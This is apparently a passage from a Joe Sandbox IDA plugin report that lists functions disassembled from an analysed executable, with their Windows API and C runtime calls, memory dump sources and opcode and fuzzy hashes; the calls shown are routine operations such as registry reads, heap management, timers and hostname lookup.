                          Function 00B1C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B1C948,SwapMouseButtons,00000004,?), ref: 00B1C979
                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00B1C948,SwapMouseButtons,00000004,?,?,?,?,00B1BF22), ref: 00B1C99A
                          • RegCloseKey.KERNEL32(00000000,?,?,00B1C948,SwapMouseButtons,00000004,?,?,?,?,00B1BF22), ref: 00B1C9BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          • Opcode ID: 77ac05c4c85208726fc2a2c6247410bcd8ec494cab5c1599f8d39bdf15ba454c
                          • Instruction ID: ebab20a498bbb1dea5f333dc76c0687d441a23d462a595ea0244e7bcc1131248
                          • Opcode Fuzzy Hash: 77ac05c4c85208726fc2a2c6247410bcd8ec494cab5c1599f8d39bdf15ba454c
                          • Instruction Fuzzy Hash: 3F117C75551208BFDB128F64DC84EEE7BF8EF04790F50449AA841E7210D6319E80DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f827085673d2bb7363ae7acd4521adc9867673d550935d82f05253e7d4da1cd
                          • Instruction ID: 96b5e976649d25d955becd0c7500eab0c0a682c6abd973410a3d7310cdfc7fb5
                          • Opcode Fuzzy Hash: 6f827085673d2bb7363ae7acd4521adc9867673d550935d82f05253e7d4da1cd
                          • Instruction Fuzzy Hash: 2EC12A75A00216EBCB14CF94C994EAEB7B5FF48714F3085D9E941AB291E730EE41CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B041A7: _fseek.LIBCMT ref: 00B041BF
                            • Part of subcall function 00B4CE59: _wcscmp.LIBCMT ref: 00B4CF49
                            • Part of subcall function 00B4CE59: _wcscmp.LIBCMT ref: 00B4CF5C
                          • _free.LIBCMT ref: 00B4CDC9
                          • _free.LIBCMT ref: 00B4CDD0
                          • _free.LIBCMT ref: 00B4CE3B
                            • Part of subcall function 00B228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B28715,00000000,00B288A3,00B24673,?), ref: 00B228DE
                            • Part of subcall function 00B228CA: GetLastError.KERNEL32(00000000,?,00B28715,00000000,00B288A3,00B24673,?), ref: 00B228F0
                          • _free.LIBCMT ref: 00B4CE43
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                          • String ID:
                          • API String ID: 1552873950-0
                          • Opcode ID: 4c2a67bf80afeb39d6635efd2a9e9b252b70a840de711fe023f2a9c04e7b89ce
                          • Instruction ID: ba4d0ec8610e00eaf6059e13e28d16128ad8a42d2867536004cb3db62c55dcfe
                          • Opcode Fuzzy Hash: 4c2a67bf80afeb39d6635efd2a9e9b252b70a840de711fe023f2a9c04e7b89ce
                          • Instruction Fuzzy Hash: B5513CB1D04218AFDB159F64DC81AAEBBB9FF48300F1040EEB65DA7291D7715A808F59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B01E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B01E87
                            • Part of subcall function 00B038E4: _memset.LIBCMT ref: 00B03965
                            • Part of subcall function 00B038E4: _wcscpy.LIBCMT ref: 00B039B5
                            • Part of subcall function 00B038E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B039C6
                          • KillTimer.USER32(?,00000001), ref: 00B01EDC
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B01EEB
                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B74526
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                          • String ID:
                          • API String ID: 1378193009-0
                          • Opcode ID: a6ef8bf7c656cd039f25c78f1a8ba780c4d940c23a8bbae1c8b7074e407dfb62
                          • Instruction ID: af6ddfb91a0cf340a2cf409cccf84b254ecac82b87a5380608276d3eff569f29
                          • Opcode Fuzzy Hash: a6ef8bf7c656cd039f25c78f1a8ba780c4d940c23a8bbae1c8b7074e407dfb62
                          • Instruction Fuzzy Hash: EC21B0B1904394ABE7328B28C855BEABFECDB16308F0444CEE69E57281C7745A85CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B592C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F282
                            • Part of subcall function 00B1F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F2A6
                          • gethostbyname.WS2_32(?), ref: 00B592F0
                          • WSAGetLastError.WS2_32(00000000), ref: 00B592FB
                          • _memmove.LIBCMT ref: 00B59328
                          • inet_ntoa.WS2_32(?), ref: 00B59333
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                          • String ID:
                          • API String ID: 1504782959-0
                          • Opcode ID: b852c9b43ec14a5369c43aa57bb19205917f30f67daae9233f139c03c37c066a
                          • Instruction ID: 2b7ba6815f841543af17a75495938583f5b77a32197d2210b7dcca13e95ed89f
                          • Opcode Fuzzy Hash: b852c9b43ec14a5369c43aa57bb19205917f30f67daae9233f139c03c37c066a
                          • Instruction Fuzzy Hash: 0311FE75900109AFCB14FBA4DD56DEE7BF9EF1431171440A5F506A72A1DF30AE04DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B2010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B245EC: __FF_MSGBANNER.LIBCMT ref: 00B24603
                            • Part of subcall function 00B245EC: __NMSG_WRITE.LIBCMT ref: 00B2460A
                            • Part of subcall function 00B245EC: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001), ref: 00B2462F
                          • std::exception::exception.LIBCMT ref: 00B2013E
                          • __CxxThrowException@8.LIBCMT ref: 00B20153
                            • Part of subcall function 00B27495: RaiseException.KERNEL32(?,?,00B0125D,00BB6598,?,?,?,00B20158,00B0125D,00BB6598,?,00000001), ref: 00B274E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                          • String ID: bad allocation
                          • API String ID: 3902256705-2104205924
                          • Opcode ID: f515863a0c38667b3e11438b186da2868f5934ac9e5f33cd85c2559ad97cd227
                          • Instruction ID: 514e0e082e1396cfb25a409decf9ac811c23c002b38dcd7b5182d4329997b2b3
                          • Opcode Fuzzy Hash: f515863a0c38667b3e11438b186da2868f5934ac9e5f33cd85c2559ad97cd227
                          • Instruction Fuzzy Hash: E2F0A43510423DB6C715BBA8F802ADEB7E8AF04351F1004D6FA1CA61D2DBB086A1D7A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5F79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 63b283bfddbffb35663850ce48597da9fa0b9f33b9f386b48e171885398a29a5
                          • Instruction ID: 7ca07de6dab717373068d8f229ef82cd057eb774b3741a55c4cb503dc2bbedc3
                          • Opcode Fuzzy Hash: 63b283bfddbffb35663850ce48597da9fa0b9f33b9f386b48e171885398a29a5
                          • Instruction Fuzzy Hash: 93F16A71A047019FC710DF24C484B6AFBE5FF88314F1489ADF9999B291D770E949CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00B0C00E,?,?,?,?,00000010), ref: 00B0C627
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00B0C65F
                          • _memmove.LIBCMT ref: 00B0C697
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$_memmove
                          • String ID:
                          • API String ID: 3033907384-0
                          • Opcode ID: de42b71c8bb00c200ef26c62910627377f29fde1a50c39510a4a1a781cffbf36
                          • Instruction ID: 6e0573f31b4821bd8432a750435f4102097547a6709367764280de63e9fa0567
                          • Opcode Fuzzy Hash: de42b71c8bb00c200ef26c62910627377f29fde1a50c39510a4a1a781cffbf36
                          • Instruction Fuzzy Hash: 1A31E9B26012016BD724AB74D846B2BBFD9EF44350F10467AF95ECB2E1EB32E950C751
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B03A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                          • SHGetMalloc.SHELL32(00B03C31), ref: 00B03A7D
                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00B03AD2
                          • SHGetDesktopFolder.SHELL32(?), ref: 00B03A8F
                            • Part of subcall function 00B03B1E: _wcsncpy.LIBCMT ref: 00B03B32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DesktopFolderFromListMallocPath_wcsncpy
                          • String ID:
                          • API String ID: 3981382179-0
                          • Opcode ID: 53b29ee3886d94773047a931983a22eecdb028e1d0ebebae3f5001fa99981b4f
                          • Instruction ID: 5545c7a2ebc5eb5c9ca278fac47caff067f338a84a4a14f6798a482978bbde84
                          • Opcode Fuzzy Hash: 53b29ee3886d94773047a931983a22eecdb028e1d0ebebae3f5001fa99981b4f
                          • Instruction Fuzzy Hash: CF213D76B00114ABCB14DB95D888EAEBBFDEF88704B144095F509D72A1DB309E46CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B245EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __FF_MSGBANNER.LIBCMT ref: 00B24603
                            • Part of subcall function 00B28E52: __NMSG_WRITE.LIBCMT ref: 00B28E79
                            • Part of subcall function 00B28E52: __NMSG_WRITE.LIBCMT ref: 00B28E83
                          • __NMSG_WRITE.LIBCMT ref: 00B2460A
                            • Part of subcall function 00B28EB2: GetModuleFileNameW.KERNEL32(00000000,00BC0312,00000104,?,00000001,00B20127), ref: 00B28F44
                            • Part of subcall function 00B28EB2: ___crtMessageBoxW.LIBCMT ref: 00B28FF2
                            • Part of subcall function 00B21D65: ___crtCorExitProcess.LIBCMT ref: 00B21D6B
                            • Part of subcall function 00B21D65: ExitProcess.KERNEL32 ref: 00B21D74
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          • RtlAllocateHeap.NTDLL(014A0000,00000000,00000001), ref: 00B2462F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                          • String ID:
                          • API String ID: 1372826849-0
                          • Opcode ID: 3283848fcce1122df45398464b77a1ccc6d0f5915afafbc99d8397745052aa9c
                          • Instruction ID: a8a30179e3ab90ceefe4b57d739b803c93e7959349b0e61f6211142b4b1c5f6e
                          • Opcode Fuzzy Hash: 3283848fcce1122df45398464b77a1ccc6d0f5915afafbc99d8397745052aa9c
                          • Instruction Fuzzy Hash: 4301B931611231AAE6227B38BC41B2A33C8EF87761F1105E5F50DDB5D5DFB49C408664
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                          Download Yara Rule
                          APIs
                          • TranslateMessage.USER32(?), ref: 00B0E646
                          • DispatchMessageW.USER32(?), ref: 00B0E651
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B0E664
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Message$DispatchPeekTranslate
                          • String ID:
                          • API String ID: 4217535847-0
                          • Opcode ID: 3e8541aa77cbf2944234e51ee4c3e236736179969a890dc02f8479afca7a9312
                          • Instruction ID: ee38b9cea4a973c0bd0adacb38d7e66f50a9094eb71820f4ab516de6193fc49a
                          • Opcode Fuzzy Hash: 3e8541aa77cbf2944234e51ee4c3e236736179969a890dc02f8479afca7a9312
                          • Instruction Fuzzy Hash: D6F058722083499BDB20EAE49C45FABB7DCAB84740F580CBEB651C20D0EAA1E4008722
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4C450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00B4C45E
                            • Part of subcall function 00B228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B28715,00000000,00B288A3,00B24673,?), ref: 00B228DE
                            • Part of subcall function 00B228CA: GetLastError.KERNEL32(00000000,?,00B28715,00000000,00B288A3,00B24673,?), ref: 00B228F0
                          • _free.LIBCMT ref: 00B4C46F
                          • _free.LIBCMT ref: 00B4C481
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                          • Instruction ID: eb0f8716bb1f8b6af06c090f800160786d40ba3aca1d1db12ed8de079c489699
                          • Opcode Fuzzy Hash: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                          • Instruction Fuzzy Hash: F8E012A1602711A6CA68AA797954BB357CCAF04B51B1449ADF44DDB382DF2CE9409138
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID: CALL
                          • API String ID: 0-4196123274
                          • Opcode ID: 06ec5e319c10d071aa74bc21a6acc71ffccfe5c3f0617db02a3a1adfe1b1e859
                          • Instruction ID: ba1d7f6254080117631d18d4b030bd299b2858823625c15a134105606b52999f
                          • Opcode Fuzzy Hash: 06ec5e319c10d071aa74bc21a6acc71ffccfe5c3f0617db02a3a1adfe1b1e859
                          • Instruction Fuzzy Hash: F5226C70618241DFD728EF14C490A6ABBE1FF84300F5589ADE99A8B2A1D771E885CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B016F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00B01751
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B0159B
                          • CoInitialize.OLE32(00000000), ref: 00B01612
                          • CloseHandle.KERNEL32(00000000), ref: 00B758F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Handle$ClipboardCloseFormatInitializeRegister
                          • String ID:
                          • API String ID: 458326420-0
                          • Opcode ID: ffe1a3b1de71860dc1b3f1f76db010a7c77d935f2fc26cd8cd2e409868b2b804
                          • Instruction ID: 0396d8a9ad871e70ddee55b63b54a9e6684b97080262b444e4215447a4c2059b
